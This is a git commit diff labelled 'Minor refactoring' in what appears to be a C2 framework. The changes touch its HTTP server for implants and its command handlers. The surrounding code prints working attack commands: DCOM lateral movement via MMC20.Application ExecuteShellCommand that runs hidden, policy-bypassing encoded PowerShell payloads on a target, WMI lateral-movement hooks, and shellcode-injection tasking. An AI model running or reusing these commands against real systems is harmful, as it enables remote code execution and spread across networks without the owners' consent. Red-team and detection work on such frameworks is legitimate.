Minor refactoring

temp
m0rv4i 2019-04-05 11:37:52 +01:00
parent 58a3545499
commit acfade268e
4 changed files with 7 additions and 19 deletions

View File

@ -50,11 +50,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
QuickCommandURI = select_item("QuickCommand", "C2Server") QuickCommandURI = select_item("QuickCommand", "C2Server")
s.server_version = ServerHeader s.server_version = ServerHeader
s.sys_version = "" s.sys_version = ""
if s.cookieHeader: if not s.cookieHeader:
r = ""
else:
s.cookieHeader = "NONE" s.cookieHeader = "NONE"
# class Tasks()
# implant gets a new task # implant gets a new task
new_task = newTask(s.path) new_task = newTask(s.path)
@ -139,7 +136,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
s.send_header("Content-type", "application/x-msdownload") s.send_header("Content-type", "application/x-msdownload")
s.end_headers() s.end_headers()
s.wfile.write(content) s.wfile.write(content)
# class Implant()
# register new implant # register new implant
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"): elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
implant_type = "Normal" implant_type = "Normal"
@ -264,7 +260,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
else: else:
print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
#print decCookie,Colours.END
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput) outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip() outputParsed = outputParsed.rstrip()
@ -283,7 +278,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
except Exception as e: except Exception as e:
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!") update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!") print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
# What should this be now?
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")): elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
update_task(taskId, "Upload shellcode complete") update_task(taskId, "Upload shellcode complete")
print ("Upload shellcode complete") print ("Upload shellcode complete")
@ -360,9 +354,9 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
print (Colours.GREEN) print (Colours.GREEN)
print (outputParsed + Colours.END) print (outputParsed + Colours.END)
except Exception as e: except Exception as e:
e = ""
# print e # print e
# traceback.print_exc() # traceback.print_exc()
pass
finally: finally:
s.send_response(200) s.send_response(200)
@ -384,7 +378,6 @@ if __name__ == '__main__':
print (Colours.GREEN + logopic) print (Colours.GREEN + logopic)
print (Colours.END + "") print (Colours.END + "")
# KeyFile = None, CertFile = None, ClientCertCAs = None
if os.path.isfile(Database): if os.path.isfile(Database):
print ("Using existing database / project" + Colours.GREEN) print ("Using existing database / project" + Colours.GREEN)
C2 = get_c2server_all() C2 = get_c2server_all()
@ -481,7 +474,6 @@ if __name__ == '__main__':
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else: else:
raise ValueError("Cannot find the certificate files") raise ValueError("Cannot find the certificate files")
#logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL
try: try:
httpd.serve_forever() httpd.serve_forever()

View File

@ -148,7 +148,7 @@ def startup(user, printhelp = ""):
except Exception as e: except Exception as e:
print ("cls") print ("cls")
print (chr(27) + "[2J") print (chr(27) + "[2J")
print (Colours.GREEN + "") print (Colours.GREEN)
print (logopic) print (logopic)
print ("") print ("")

View File

@ -181,7 +181,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
new_task(cmd, user, randomuri) new_task(cmd, user, randomuri)
# wmi lateral movement # wmi lateral movement
elif "invoke-wmiproxypayload" in command.lower(): elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
@ -218,7 +217,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
new_task(cmd, user, randomuri) new_task(cmd, user, randomuri)
# dcom lateral movement # dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower(): elif "invoke-dcomproxypayload" in command.lower():
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
@ -226,7 +224,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
params = params.sub("", command) params = params.sub("", command)
p = re.compile(r'(?<=-target.).*') p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group() target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri) new_task(pscommand, user, randomuri)
else: else:
startup(user, "Need to run createproxypayload first") startup(user, "Need to run createproxypayload first")
@ -237,7 +235,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
p = re.compile(r'(?<=-target.).*') p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group() target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri) new_task(pscommand, user, randomuri)
else: else:
startup(user, "Need to run createdaisypayload first") startup(user, "Need to run createdaisypayload first")
@ -250,11 +248,10 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
payload = newPayload.CreateRawBase() payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*') p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group() target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri) new_task(pscommand, user, randomuri)
# runas payloads # runas payloads
elif "invoke-runasdaisypayload" in command.lower(): elif "invoke-runasdaisypayload" in command.lower():
daisyname = raw_input("Name required: ") daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):

View File

@ -75,7 +75,6 @@ def handle_sharp_command(command, user, randomuri, startup):
try: try:
shellcodefile = load_file(path) shellcodefile = load_file(path)
if shellcodefile != None: if shellcodefile != None:
arch = "64"
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri) new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
except Exception as e: except Exception as e:
print ("Error loading file: %s" % e) print ("Error loading file: %s" % e)